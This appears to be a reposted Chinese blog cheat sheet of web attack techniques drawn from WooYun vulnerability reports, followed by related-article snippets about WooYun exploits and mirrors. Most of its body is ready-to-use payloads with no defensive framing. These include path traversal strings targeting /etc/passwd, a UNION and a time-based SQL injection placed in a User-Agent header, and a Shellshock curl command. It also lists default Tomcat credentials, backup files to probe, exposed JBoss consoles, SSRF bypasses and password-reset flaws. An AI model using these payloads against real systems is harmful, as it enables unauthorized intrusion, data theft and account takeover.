那些年 WooYun 的漏洞

最新推荐文章于 2024-08-26 17:37:40 发布
最新推荐文章于 2024-08-26 17:37:40 发布
阅读量290 收藏
点赞数
文章标签: 运维 java
原文链接:http://www.cnblogs.com/skrr/p/10987425.html
版权

Type:

  • 任意文件读取

    ../../../../../../../../../../etc/passwd%00
    /etc/sysconfig/network
    ../../../foo/../../../../etc/passwd   //nodejs

  • SQL注入

    and 1=2 union select 1,2,version(),3%23
blind sqli
error sqli
宽字节注入
    框架注入(ThinkPHP)
    GET POST 参数
    伪静态  *
    Referer
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5*0),0))OR'

  • 弱口令

    Username:中国姓名排行TOP500
Password:admin  admin123 qyer           //字典的重要性!!!
    /manager/html  tomcat:tomcat
    ftp 弱口令  phpmyadmin 弱口令

  • 敏感信息泄露

    .bak  /.svn/entries  wwwroot.tar.gz .swp  web.rar %domain%.zip  %dictionary%.rar
    openssl
    目录遍历
    shodan
    github 敏感信息
    .NET 相关类 逆向解密 dll
    api 接口泄露
    社工库查询相关人员信息

  • 未授权访问

    RSYNC 匿名访问
    JBoss:/jmx-console/  /admin-console/

  • 命令执行

    CMS(discuz、)命令执行
    curl http://1XX.XX.XX.XX:8082/cgi-bin/test-cgi -A "() { foo;};echo;/bin/ps -ef" -k
    http://test.xxx.com:8082/struts_spy/example/HelloWorld.action //struts2

  • 任意文件上传

    cer、

  • SSRF

    url=           //ip服务
    DNS Rebinding 绕过

  • 设计缺陷

    验证码可识别
    水平越权,修改相关参数
    任意用户邮箱地址查询:修改对应查询参数
    任意密码重置:验证身份token简单可爆破
    单点登陆绕过:其它参数替代绕过

转载于:https://www.cnblogs.com/skrr/p/10987425.html

weixin_30535565
关注
WooYun-2016-199433 phpmyadmin 反序列化漏洞
weixin_51387754的博客
12-08 389
漏洞简介 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。 漏洞复现 执行如下命令启动phpmyadmin: docker-compose up -d 环境启动后,访问http://your-ip:8080,即可看到phpmyadmin的首页。因为没有连接数据库,所以此时会报错,但我们这个漏洞的利用与数据库无关,所以忽略。 发送如下数据包,即可读取/etc/passwd: POST /scripts/setup.php HTTP/1.1 Hos
本地搭建Wooyun漏洞库(二)——Ubuntu 18.04下搭建WooYun漏洞
浅浅的博客
08-23 3168
本文参考https://github.com/grt1st/wooyun_search 这篇文章是建立在已经搭建好LAMP环境的基础上进行的,搭建方法可见:本地搭建Wooyun漏洞库(一)——Ubuntu 18.04下搭建LAMP环境 一、下载资源 访问https://github.com/grt1st/wooyun_search,下载所需文件。 下载该ZIP文件(文件名为:wooyu...
探索WooyunAllBugs:一款开源的安全漏洞聚合平台
gitblog_00039的博客
04-17 292
探索WooyunAllBugs:一款开源的安全漏洞聚合平台 项目地址:https://gitcode.com/m0l1ce/wooyunallbugs 简介 WooyunAllBugs 是一个基于Python编写的开源项目,旨在收集、整理并展示来自中国著名安全社区Wooyun(现已更名为Qihoo 360 Netlab)的所有公开安全漏洞信息。对于安全研究人员、开发人员以及对网络安全感兴趣的用户来...
wooyu漏洞库YYDS!!!入门之道:重现乌云漏洞
最新发布
honest_gg的博客
08-26 457
wooyun乌云漏洞库手把手搭建教程,最全没有之一!!!
WooYun-2015-110216 ElasticSearch写入webshell漏洞
weixin_51387754的博客
11-19 1876
漏洞原理 ElasticSearch具有备份数据的功能,用户可以传入一个路径,让其将数据备份到该路径下,且文件名和后缀都可控。 所以,如果同文件系统下还跑着其他服务,如Tomcat、PHP等,我们可以利用ElasticSearch的备份功能写入一个webshell。 和CVE-2015-5531类似,该漏洞和备份仓库有关。在elasticsearch1.5.1以后,其将备份仓库的根路径限制在配置文件的配置项path.repo中,而且如果管理员不配置该选项,则默认不能使用该功能。即使管理员配置了该选项,web
Wooyun最新确认漏洞爬虫V0.02
如果我写代码写得够快是不是就能赶上青春
05-22 1548
Wooyun最新确认漏洞爬虫v0.02#coding:utf-8 import requests import re from bs4 import BeautifulSoup wooyun_confirm='http://www.wooyun.org/bugs/new_confirm' wooyun_url='http://www.wooyun.org' wooyun_url_result=re.
Elasticsearch写入webshell漏洞WooYun-2015-110216)
weixin_45366453的博客
07-02 403
Elasticsearch写入webshell漏洞WooYun-2015-110216)
正方教务管理系统数据库任意操作漏洞 _ 乌云漏洞库,乌云镜像站, WooYun 漏洞库, WooYun 镜像站1
08-03
【正方教务管理系统数据库任意操作漏洞】是一个严重的安全问题,涉及到国内广泛应用的正方教务管理系统。这个漏洞源于系统默认配置不当,使得攻击者能够进行任意数据库操作,只要他们知道服务器的IP地址。由于全国有...
WooYun_Bugs(漏洞库)、Qingy安全漏洞库、佩奇PeiQi-WIKI-POC漏洞库、yougar0等漏洞
06-07
WooYun_Bugs(漏洞库)、Qingy安全漏洞库、佩奇PeiQi-WIKI-POC漏洞库、yougar0等漏洞库几10个G左右(如有侵权联系删除,分享资源仅用于教学和交流)
本地搭建Wooyun漏洞库(一)——Ubuntu 18.04下搭建LAMP环境
浅浅的博客
08-18 1104
在开始搭建环境之前,先介绍一下LAMP框架。LAMP代表Linux,Apache Web服务器,MySQL和PHP,目前大部分Web应用程序都部署在LAMP环境上。这意味着Linux Web服务器安装了Apache Web Server,MySQL数据库服务器和PHP超文本预处理器,以便为基于Web的应用程序提供服务。 Apache主要实现如下功能: 1、处理http的请...
wooyun镜像离线数据库
06-11
wooyun镜像离线数据库,此数据库为hancool作者封的wooyun系统镜像包内系统的mysql数据库所提取,该系统3306端口不对外开放,为了初学者搭建属于自己的wooyun漏洞库,特地进行离线处理。此提取包含了txt和sql(带结构...
乌云漏洞库/知识库离线下载-附件资源
03-05
乌云漏洞库/知识库离线下载-附件资源
wooyun.7z乌云数据库
10-22
wooyun.7z乌云数据库
wooyun drops乌云知识库全部文章.zip
09-13
自行脑补,自行脑补,自行脑补,自行脑补,自行脑补,自行脑补,自行脑补,自行脑补,自行脑补,自行脑补,自行脑补,自行脑补,我只是资料的搬运工,内容质量不负责
精防wooyun程序源码加数据库
01-09
使用ThinkPHP,精品防止wooyun源码程序。
那些wooyun忽略的漏洞
weixin_34283445的博客
07-03 124
新手学python系列之那些wooyun忽略的漏洞们……   程序执行完会整理出wooyun漏洞列表中所有被忽略的漏洞url,无奈正则太菜,没整理出漏洞标题,只列出了url。   程序还有点bug,会打印2次url,不知道原因所在,也懒得解决了。其中bestcoding模块是在某群找到的万能编码的小程序,能省很多力气,本小程序中可以忽略不用。先贴上程序...
本地搭建Wooyun漏洞库环境
dieman0446的博客
05-03 743
众所周知,wooyun上有太多含金量的漏洞了,虽然互联网上也有相关的漏洞资源分享,但是万一有朝一日也被和谐了就又麻烦了,最放心的方式就是漏洞库放在本地,在本地搭建一套环境最好不过了,以下操作演示了如何在本地搭建wooyun漏洞库环境。 1. 文件准备 (1)PHPnow-1.5.6.1428396605.zip # 绿色免费的 Apache +PHP+ MySQL 环境套件 ...
漏洞复现-discuz-wooyun-命令执行】vulfocus/discuz-wooyun_2010_080723
10-14 1228
【discuz-wooyun-命令执行】Cookie中命令执行
Wooyun漏洞库本地搭建
qq_40624810的博客
12-01 1802
身为男人,怎么能屈服于力量之下 一、漏洞库虚拟机下载 从github下载:https://github.com/hanc00l 二、解压第一个文件 三、用VM打开.vmx文件 这是一个挂起状态的虚拟机,直接运行即可 用户名/密码 : hancool/qwe123 这里的IP可能会ping不通主机,这里方式为dhcp,可以重启网卡,或者重启虚拟机都能重新获得ip,保证主机和虚拟机可以ping通就行 四、分别进入两个目录执行命令 1. cd wooyun scrapy c..
乌云月爆201501期:安全漏洞与修复误区
本文是关于计算机安全的专题报告,由知名漏洞公布网站wooyun编纂的“乌云月爆”,详细揭示了近期网络安全领域出现的新问题。该期报告共包含了多个安全漏洞案例,涉及不同领域的服务和产品,如阿里云、墨迹天气、QQ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值